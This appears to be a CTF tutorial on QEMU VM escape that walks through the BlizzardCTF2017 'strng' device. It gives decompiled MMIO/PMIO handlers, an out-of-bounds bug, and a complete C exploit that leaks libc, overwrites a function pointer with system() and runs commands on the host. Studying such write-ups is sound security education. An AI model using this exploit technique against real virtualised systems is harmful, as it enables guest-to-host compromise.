Skip to content

Introduction to QEMU Escape

QEMU escape is essentially not very different from userland Pwn challenges; it is just presented in a slightly different form. The challenge itself is typically presented as a QEMU emulated device, which usually implements some functionality and provides user-controllable MMIO/PMIO interfaces. Contestants typically need to write a program that interacts with these interfaces and upload it to the remote host for execution to complete the exploit (similar to kernel Pwn).

Below, we will go through a sample challenge to understand the basic approach for QEMU Pwn challenges.

Example: BlizzardCTF2017 - Strng

Note: The challenge environment can be downloaded from Github. The login username is ubuntu and the password is passw0rd.

Challenge Analysis

First, we examine the startup script and can see that it loads a custom device strng through the -device strng parameter.

./qemu-system-x86_64 \
    -m 1G \
    -device strng \
    -hda my-disk.img \
    -hdb my-seed.img \
    -nographic \
    -L pc-bios/ \
    -enable-kvm \
    -device e1000,netdev=net0 \
    -netdev user,id=net0,hostfwd=tcp::5555-:22

We directly load the QEMU binary into IDA for analysis. First, we find the string "strng" through the Strings window, which leads us to the device's initialization function:

We can see that the device registers both MMIO and PMIO functional interfaces, and places several function pointers at certain positions:

/*
 * Instance initializer of the "strng" device (IDA decompilation).
 *
 * Stores the addresses of srand, rand and rand_r into the device state.
 * IDA renders the destinations as Object_0 array indexing; the disassembly
 * of this function shows the three stores going to byte offsets 0xBF8,
 * 0xC00 and 0xC08 from the pointer returned by the cast.
 */
void __fastcall strng_instance_init(Object_0 *obj)
{
  Object_0 *v1; // rax

  // Checked cast of obj to the "strng" type; v1 is used as the device state.
  v1 = object_dynamic_cast_assert(obj, "strng", "/home/rcvalle/qemu/hw/misc/strng.c", 145, "strng_instance_init");
  *(_QWORD *)&v1[76].ref = &srand;             // srand pointer (+0xBF8 in the disassembly)
  v1[76].parent = (Object_0 *)&rand;           // rand pointer (+0xC00 in the disassembly)
  v1[77].class = (ObjectClass_0 *)&rand_r;     // rand_r pointer (+0xC08 in the disassembly)
}

/*
 * Realize callback of the strng PCI device (IDA decompilation).
 *
 * Initializes two I/O memory regions, one backed by strng_mmio_ops and one by
 * strng_pmio_ops, and registers them as PCI BAR 0 and BAR 1. Both regions get
 * pdev as their opaque pointer. errp is not used in the decompiled body.
 */
void __fastcall pci_strng_realize(PCIDevice_0 *pdev, Error_0 **errp)
{
  // "strng-mmio": 0x100-byte region, i.e. 64 four-byte registers.
  memory_region_init_io(
    (MemoryRegion_0 *)&pdev[1],
    &pdev->qdev.parent_obj,
    &strng_mmio_ops,
    pdev,
    "strng-mmio",
    0x100uLL);
  // BAR 0 with type argument 0 (presumably the memory-space BAR type -- confirm against QEMU's PCI API).
  pci_register_bar(pdev, 0, 0, (MemoryRegion_0 *)&pdev[1]);
  // "strng-pmio": 8-byte region.
  memory_region_init_io(
    (MemoryRegion_0 *)&pdev[1].io_regions[0].size,
    &pdev->qdev.parent_obj,
    &strng_pmio_ops,
    pdev,
    "strng-pmio",
    8uLL);
  // BAR 1 with type argument 1 (presumably the I/O-space BAR type -- confirm against QEMU's PCI API).
  pci_register_bar(pdev, 1, 1u, (MemoryRegion_0 *)&pdev[1].io_regions[0].size);
}

The function pointer placements decompiled by IDA look a bit odd, so let's look at the assembly source directly:

.text:000000000041033E                 call    object_dynamic_cast_assert
.text:0000000000410343 strng = rax                             ; STRNGState *
.text:0000000000410343                 mov     rdx, cs:srand_ptr_0
.text:000000000041034A                 mov     [strng+0BF8h], rdx
.text:0000000000410351                 mov     rdx, cs:rand_ptr_0
.text:0000000000410358                 mov     [strng+0C00h], rdx
.text:000000000041035F                 mov     rdx, cs:rand_r_ptr
.text:0000000000410366                 mov     [strng+0C08h], rdx

Next, we jump to the corresponding functions in the function table for analysis. At (u32*)opaque[701] there is an unsigned int array (which we define as opaque->buf). The MMIO read mainly reads 4 bytes of content from opaque->buf[(addr >> 2)]. While it seems like an out-of-bounds read could be possible, QEMU internally checks whether the MR access range (addr) exceeds the defined memory range, so out-of-bounds reads are actually not possible:

The opaque parameter is actually a custom subclass of the PCIDevice class that is dynamically allocated when the device is loaded.

/*
 * MMIO read handler (IDA decompilation).
 *
 * For a 4-byte access at a 4-byte-aligned addr, returns the 32-bit value at
 * dword index 701 + (addr >> 2) counted from opaque. Every other access
 * returns -1. The handler itself performs no bounds check on addr.
 */
uint64_t __fastcall strng_mmio_read(void *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax

  result = -1LL;
  if ( size == 4 && (addr & 3) == 0 )
    result = *((unsigned int *)opaque + (addr >> 2) + 701);
  return result;
}

The MMIO write functionality provides different features depending on the write address (a bit messy):

  • Address 0: Calls the data at (u64*)opaque[383] as a function pointer, with the passed value as the argument
  • Address 1 << 2: Calls the data at (u64*)opaque[384] as a function pointer, and writes the result to opaque->buf[1]
  • Address other value << 2: Writes the passed value at opaque->buf[(addr>>2)]
  • If the address is 3 << 2, then before writing, the data at (u64*)opaque[385] is called as a function pointer with argument &((char*)opaque[2812]), and the passed value is written to opaque->buf[3]
/*
 * MMIO write handler (IDA decompilation).
 *
 * Only 4-byte accesses at 4-byte-aligned addresses are handled; everything
 * else is ignored. The register index is addr >> 2 and the register array
 * starts at dword index 701 from opaque:
 *   index 0     - calls the function pointer in qword slot 383 with val
 *   index 1     - calls the function pointer in qword slot 384 and stores the
 *                 result at dword 702 (register 1)
 *   index 3     - calls the function pointer in qword slot 385 with
 *                 opaque + 2812 (the address of register 2), stores the result
 *                 at dword 704 (register 3), then overwrites it with val
 *   other index - stores val into the indexed register
 * Qword slots 383/384/385 are byte offsets 0xBF8/0xC00/0xC08.
 */
void __fastcall strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  hwaddr v4; // rsi
  int v5; // eax
  int vala; // [rsp+8h] [rbp-30h]

  if ( size == 4 && (addr & 3) == 0 )
  {
    v4 = addr >> 2;
    if ( (_DWORD)v4 == 1 )
    {
      // Register 1: result of the slot-384 callback.
      *((_DWORD *)opaque + 702) = (*((__int64 (__fastcall **)(void *, hwaddr, uint64_t))opaque + 384))(opaque, v4, val);
    }
    else if ( (_DWORD)v4 )
    {
      if ( (_DWORD)v4 == 3 )
      {
        // val is saved across the call and restored afterwards.
        vala = val;
        v5 = (*((__int64 (__fastcall **)(char *))opaque + 385))((char *)opaque + 2812);
        LODWORD(val) = vala;
        *((_DWORD *)opaque + 704) = v5;
      }
      // Runs for index 3 as well, so register 3 finally holds val.
      *((_DWORD *)opaque + (unsigned int)v4 + 701) = val;
    }
    else
    {
      // Index 0: slot-383 callback receives the low 32 bits of val.
      (*((void (__fastcall **)(_QWORD))opaque + 383))((unsigned int)val);
    }
  }
}

The PMIO read functionality performs data reading:

  • If addr == 0, returns the value of (unsigned int *)opaque[700].
  • If addr == 4, obtains the value v4 of (unsigned int *)opaque[700]. If the lower 2 bits are 0, it returns the data at opaque->buf[(v4 >> 2)].

If we can control the value of (unsigned int *)opaque[700], we can directly perform an out-of-bounds read.

/*
 * PMIO read handler (IDA decompilation).
 *
 * Only 4-byte accesses are handled; the default result is -1.
 *   addr == 0 - returns the 32-bit value at dword index 700 from opaque
 *   addr == 4 - reads that same value as v4 and, if its low two bits are
 *               clear, returns the register at dword index 701 + (v4 >> 2)
 * No upper bound is applied to v4 before it is used as an index.
 */
uint64_t __fastcall strng_pmio_read(void *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax
  unsigned int v4; // edx

  result = -1LL;
  if ( size == 4 )
  {
    if ( addr )
    {
      if ( addr == 4 )
      {
        // v4 is the value previously stored at dword 700.
        v4 = *((_DWORD *)opaque + 700);
        if ( (v4 & 3) == 0 )
          result = *((unsigned int *)opaque + (v4 >> 2) + 701);
      }
    }
    else
    {
      result = *((unsigned int *)opaque + 700);
    }
  }
  return result;
}

The PMIO write functionality is defined as follows:

  • If addr == 0, the passed value is written to (unsigned int *)opaque[700], so combined with PMIO read we can complete an out-of-bounds read.
  • If addr == 4, obtains the value v4 of (unsigned int *)opaque[700]. If the lower 2 bits are 0, let v5 = v4 >> 2:
  • If v5 == 1, calls the function pointer at (u64*)opaque[384], writes the return value to opaque->buf[1], see code for arguments
  • If v5 == 3, calls the function pointer at (u64*)opaque[385], writes the return value to opaque->buf[3], see code for arguments
  • Otherwise, if v5 != 0, writes the passed value to opaque->buf[v5]
  • If v5 == 0, calls the function pointer at (u64*)opaque[383], with our passed value as the argument
/*
 * PMIO write handler (IDA decompilation).
 *
 * Only 4-byte accesses are handled.
 *   addr == 0 - stores val at dword index 700 from opaque
 *   addr == 4 - reads dword 700 as v4; if its low two bits are clear,
 *               v5 = v4 >> 2 selects the action:
 *       v5 == 0 - calls the function pointer in qword slot 383 with val
 *       v5 == 1 - calls the function pointer in qword slot 384 and stores the
 *                 result at dword 702 (register 1)
 *       v5 == 3 - calls the function pointer in qword slot 385 with
 *                 opaque + 2812 (the address of register 2) as first argument
 *                 and stores the result at dword 704 (register 3); val itself
 *                 is not stored
 *       other   - stores val at dword index 701 + v5, with no upper bound
 *                 applied to v5
 * Qword slots 383/384/385 are byte offsets 0xBF8/0xC00/0xC08.
 */
void __fastcall strng_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  unsigned int v4; // eax
  __int64 v5; // rax

  if ( size == 4 )
  {
    if ( addr )
    {
      if ( addr == 4 )
      {
        v4 = *((_DWORD *)opaque + 700);
        if ( (v4 & 3) == 0 )
        {
          v5 = v4 >> 2;
          if ( (_DWORD)v5 == 1 )
          {
            *((_DWORD *)opaque + 702) = (*((__int64 (__fastcall **)(void *, __int64, uint64_t))opaque + 384))(
                                          opaque,
                                          4LL,
                                          val);
          }
          else if ( (_DWORD)v5 )
          {
            if ( (_DWORD)v5 == 3 )
              *((_DWORD *)opaque + 704) = (*((__int64 (__fastcall **)(char *, __int64, uint64_t))opaque + 385))(
                                            (char *)opaque + 2812,
                                            4LL,
                                            val);
            else
              // Index comes straight from dword 700.
              *((_DWORD *)opaque + v5 + 701) = val;
          }
          else
          {
            (*((void (__fastcall **)(_QWORD))opaque + 383))((unsigned int)val);
          }
        }
      }
    }
    else
    {
      // addr == 0: latch the value later used as v4.
      *((_DWORD *)opaque + 700) = val;
    }
  }
}

Exploitation

Since the read address for the PMIO read functionality is determined by (unsigned int *)opaque[700], and this value can be modified through PMIO write at addr == 0, and since the challenge initially places some function pointers at the end of opaque, we can leak the libc base address by reading these function pointers.

Similarly, when addr == 4, PMIO write writes data to a specified address + offset, where the offset is our controllable (unsigned int *)opaque[700]. Therefore, we can conveniently hijack the function pointers on opaque, and these function pointers can be triggered through MMIO write and PMIO write. It's not hard to see that we can achieve control flow hijacking by hijacking these function pointers.

When (unsigned int *)opaque[700] >> 2 == 3 (i.e. the stored value is 3 << 2), PMIO write calls the function pointer at (u64*)opaque[385] and passes an address on opaque (&opaque->buf[2]) as the first argument, and the data at that location is also controllable by us. Therefore, we can first write a string there, then hijack the function pointer to system() and call it directly to achieve arbitrary command execution on the Host.

Interaction Method

QEMU pwn challenges provide us with a local Linux environment, usually with root privileges (except for some nested challenges that require privilege escalation first). Typically, we need to write the exploit in C, statically compile it, and then transfer it to the remote machine for execution. Some challenges also provide a local compilation environment (such as this one), so we only need to transfer the exploit source code to the remote and compile & run it there.

First, let's discuss how to interact with the challenge. QEMU pwn vulnerabilities usually appear in a custom PCI device. We can use the lspci command to view existing PCI devices. At the beginning of each device, you can see a hexadecimal number in the format xx:yy.z, which is actually bus number:device number.function number. When we use lspci -v to view PCI device information, the 4-digit number before the bus number is the PCI domain number.

Usually, we can see an unrecognized device, which is typically the challenge device. Here we can see the PMIO address is 0xc050 and the MMIO address (physical address) is 0xfebf1000:

For PMIO interaction, we can first obtain interaction permissions through iopl(3), then directly use the in() and out() family of functions to read and write ports. Note that the port address should be aligned to the read/write length (e.g., for 4-byte read/write, the port address needs to be aligned to 4). Here is an example:

/*
 * Write the 32-bit value `val` to I/O port `port` with outl().
 * The process must already have been granted port access (e.g. via iopl(3)).
 */
void pmio_write(uint32_t port, uint32_t val)
{
    const unsigned short io_port = (unsigned short) port;

    outl(val, io_port);
}

/*
 * Read a 32-bit value from I/O port `port` with inl() and return it.
 * The process must already have been granted port access (e.g. via iopl(3)).
 */
uint32_t pmio_read(uint32_t port)
{
    uint32_t value = inl((unsigned short) port);

    return value;
}

/*
 * PMIO interaction example: obtain I/O port privileges with iopl(3), then
 * read the port at offset 0 and write the port at offset 4 of the device's
 * PMIO range (base 0xc050 for this challenge).
 */
int main(int argc, char **argv, char **envp)
{
    uint32_t  pmio_port = 0xc050;
    uint32_t  val;
    //...

    if (iopl(3) < 0) {
        errExit("failed to change i/o privilege! no root?");
    }

    /* This is just an example */
    val = pmio_read(pmio_port);
    pmio_write(pmio_port + 4, 0xdeadbeef);
    //...
}

The MMIO interaction method is slightly more involved because MMIO essentially involves directly reading and writing the corresponding physical addresses. However, we can use mmap() to map the resource file under sysfs to complete memory access. Taking this challenge as an example, the number obtained through the lspci command is 00:03.0, so we can use mmap() to map /sys/devices/pci0000:00/0000:00:03.0/resource0 to directly perform MMIO. Similar to PMIO, the MMIO read/write address also needs to be aligned to the read/write length. Here is an example:

/*
 * Store the 32-bit value `val` to the device register at `addr`.
 *
 * `addr` points into a memory-mapped I/O region, so the store goes through a
 * volatile-qualified pointer: the compiler must emit exactly this access and
 * may not merge, reorder or drop it. Callers passing a plain `uint32_t *`
 * keep working because the qualifier is added implicitly.
 */
void mmio_write(volatile uint32_t *addr, uint32_t val)
{
    *addr = val;
}

/*
 * Load and return the 32-bit value of the device register at `addr`.
 *
 * `addr` points into a memory-mapped I/O region, so the load goes through a
 * volatile-qualified pointer: the compiler must perform the access every time
 * and may not reuse a previously read value. Callers passing a plain
 * `uint32_t *` keep working because the qualifier is added implicitly.
 */
uint32_t mmio_read(volatile uint32_t *addr)
{
    return *addr;
}

/*
 * MMIO interaction example: map the device's resource0 file from sysfs and
 * access its registers through the mapping.
 *
 * The mapping is kept as a pointer rather than an integer so that it can be
 * compared with MAP_FAILED and handed to mmio_read()/mmio_write() without
 * integer/pointer conversions.
 */
int main(int argc, char **argv, char **envp)
{
    uint32_t  *mmio_addr;
    void  *mapping;
    int   mmio_fd;
    long  val;
    //...
    mmio_fd = open("/sys/devices/pci0000:00/0000:00:03.0/resource0",
            O_RDWR | O_SYNC);
    if (mmio_fd < 0) {
        errExit("failed to open mmio file! wrong path or no root?");
    }

    mapping = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mapping == MAP_FAILED) {
        errExit("failed to mmap mmio space!");
    }
    mmio_addr = mapping;

    /* This is just an example */
    val = mmio_read(mmio_addr);
    /* mmio_addr + 1 is byte offset 4, i.e. the second 32-bit register */
    mmio_write(mmio_addr + 1, 0xbeefdead);
    //...
}

Note: We can also perform PMIO through memory read/write by mapping the /sys/devices/pci0000:00/0000:00:03.0/resource1 file.

The complete exploit is as follows, which executes cat ./flag and a calculator launch command:

#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/io.h>
#include <sys/mman.h>

/* Number of 32-bit registers in the device's MMIO region (0x100 bytes / 4). */
#define STRNG_MMIO_REGS 64
/* Size of the MMIO region in bytes. */
#define STRNG_MMIO_SIZE (STRNG_MMIO_REGS * sizeof(uint32_t))

/* Port offset whose write sets the value the device later uses as register address. */
#define STRNG_PMIO_ADDR 0
/* Port offset whose read/write accesses the register selected through STRNG_PMIO_ADDR. */
#define STRNG_PMIO_DATA 4
#define STRNG_PMIO_REGS STRNG_MMIO_REGS
/* Size of the PMIO region in bytes. */
#define STRNG_PMIO_SIZE 8

/* Command text that main() copies into the device registers, starting at register 6. */
char calc_str[0x100] = ";cat ./flag;gnome-calculator";
/* Not referenced by the rest of this exploit as shown. */
char sh_str[0x100] = "/bin/sh";

/*
 * Print an "[x] Error: " banner (ANSI red + bold) followed by `msg` and a
 * newline to stdout, then terminate the process with EXIT_FAILURE.
 * This function does not return.
 *
 * `msg` is only read, and every caller passes a string literal, so it is
 * taken as a pointer to const.
 */
void errExit(const char *msg)
{
    printf("\033[31m\033[1m[x] Error: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

/*
 * Store the 32-bit value `val` to the device register at `addr`.
 *
 * `addr` points into a memory-mapped I/O region, so the store goes through a
 * volatile-qualified pointer: the compiler must emit exactly this access and
 * may not merge, reorder or drop it. Callers passing a plain `uint32_t *`
 * keep working because the qualifier is added implicitly.
 */
void mmio_write(volatile uint32_t *addr, uint32_t val)
{
    *addr = val;
}

/*
 * Load and return the 32-bit value of the device register at `addr`.
 *
 * `addr` points into a memory-mapped I/O region, so the load goes through a
 * volatile-qualified pointer: the compiler must perform the access every time
 * and may not reuse a previously read value. Callers passing a plain
 * `uint32_t *` keep working because the qualifier is added implicitly.
 */
uint32_t mmio_read(volatile uint32_t *addr)
{
    return *addr;
}

/*
 * Write the 32-bit value `val` to I/O port `port` with outl().
 * main() obtains port access with iopl(3) before the first call.
 */
void pmio_write(uint32_t port, uint32_t val)
{
    const unsigned short io_port = (unsigned short) port;

    outl(val, io_port);
}

/*
 * Read a 32-bit value from I/O port `port` with inl() and return it.
 * main() obtains port access with iopl(3) before the first call.
 */
uint32_t pmio_read(uint32_t port)
{
    uint32_t value = inl((unsigned short) port);

    return value;
}

/*
 * Exploit entry point.
 *
 * 1. Maps the device's MMIO BAR and obtains I/O port privileges.
 * 2. Places the command string in the device registers, starting at regs[2].
 * 3. Leaks the srand pointer stored behind the register array through an
 *    out-of-bounds PMIO read and derives the address of system().
 * 4. Overwrites the rand_r pointer with system() through an out-of-bounds
 *    PMIO write.
 * 5. Triggers the rand_r slot through PMIO, which receives &regs[2] as its
 *    first argument.
 *
 * Terminates through errExit() when the resource file cannot be opened or
 * mapped, or when iopl(3) fails. Returns 0 otherwise.
 */
int main(int argc, char **argv, char **envp)
{
    void        *mmio_map;
    uint32_t    *mmio_regs;
    uint32_t    pmio_port = 0xc050;
    int         mmio_fd;
    uint32_t    srand_addr_low, srand_addr_high;
    uint64_t    srand_addr;
    uint64_t    libc_addr;
    uint64_t    system_addr;

    /*
     * initialization
     */
    mmio_fd = open("/sys/devices/pci0000:00/0000:00:03.0/resource0",
            O_RDWR | O_SYNC);
    if (mmio_fd < 0) {
        errExit("failed to open mmio file! wrong path or no root?");
    }

    if (iopl(3) < 0) {
        errExit("failed to change i/o privilege! no root?");
    }

    /* keep the mapping as a pointer so it can be compared with MAP_FAILED */
    mmio_map = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_map == MAP_FAILED) {
        errExit("failed to mmap mmio space!");
    }
    mmio_regs = mmio_map;

    /*
     * The hijacked rand_r slot is later called with &regs[2], so the command
     * string has to start there. regs[2..5] are filled with "aaaa" padding.
     *
     * An MMIO write to regs[3] makes the device call rand_r(&regs[2]) first,
     * and rand_r() updates the seed it is given. The padding is therefore
     * written from regs[5] down to regs[2], so that regs[2] is stored after
     * that call and keeps its value.
     */
    for (int i = 3; i >= 0; i--)
        mmio_write(mmio_regs + 2 + i, 0x61616161 /* "aaaa" */);

    /* copy the first 40 bytes of calc_str (command plus NUL padding) to regs[6..15] */
    for (int i = 0; i < 10; i++) {
        uint32_t word;

        /* memcpy instead of casting calc_str to uint32_t * (aliasing/alignment) */
        memcpy(&word, calc_str + i * sizeof(word), sizeof(word));
        mmio_write(mmio_regs + 6 + i, word);
    }

    /*
     * exploitation
     */

    /*
     * Stage.I - leaking libc addr
     * set the strng->addr by pmio_write to a oob val
     * so that we can make an oob read by pmio_read
     * (regs[65] and regs[66] overlap the srand pointer at offset 0xBF8)
     */
    puts("[*] Stage.I - leaking libc addr\n");

    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 1) << 2);
    srand_addr_low = pmio_read(pmio_port + STRNG_PMIO_DATA);
    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 2) << 2);
    srand_addr_high = pmio_read(pmio_port + STRNG_PMIO_DATA);

    srand_addr = srand_addr_high;
    srand_addr <<= 32;
    srand_addr += srand_addr_low;
    /* NOTE: presumably the offsets of srand and system in the target's libc -- adjust per libc build */
    libc_addr = srand_addr - 0x460a0;
    system_addr = libc_addr + 0x50d60;

    printf("[+] get addr of srand: 0x%" PRIx64 "\n", srand_addr);
    printf("[+] libc addr: 0x%" PRIx64 "\n", libc_addr);
    printf("[+] system addr: 0x%" PRIx64 "\n", system_addr);

    /*
     * Stage.II - overwrite the rand_r ptr
     * set the strng->rand_r to system by oob write in pmio
     * (regs[69] and regs[70] overlap the rand_r pointer at offset 0xC08)
     */
    puts("\n[*] Stage.II - overwrite the rand_r ptr\n");

    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 5) << 2);
    pmio_write(pmio_port + STRNG_PMIO_DATA, (uint32_t) system_addr);
    pmio_write(pmio_port + STRNG_PMIO_ADDR, (STRNG_MMIO_REGS + 6) << 2);
    pmio_write(pmio_port + STRNG_PMIO_DATA, (uint32_t) (system_addr >> 32));

    puts("[+] write done!");

    /*
     * Stage.III - control flow hijack!
     * call the strng->rand_r by pmio_write and hijack the control flow!
     */
    puts("\n[*] Stage.III - control flow hijack\n");

    puts("[*] trigger the strng->rand_r()...");
    pmio_write(pmio_port + STRNG_PMIO_ADDR, 3 << 2);
    pmio_write(pmio_port + STRNG_PMIO_DATA, 0xdeadbeef);

    return 0;
}

REFERENCE

qemu pwn-Blizzard CTF 2017 Strng writeup

【HARDWARE.0x00】PCI 设备简易食用手册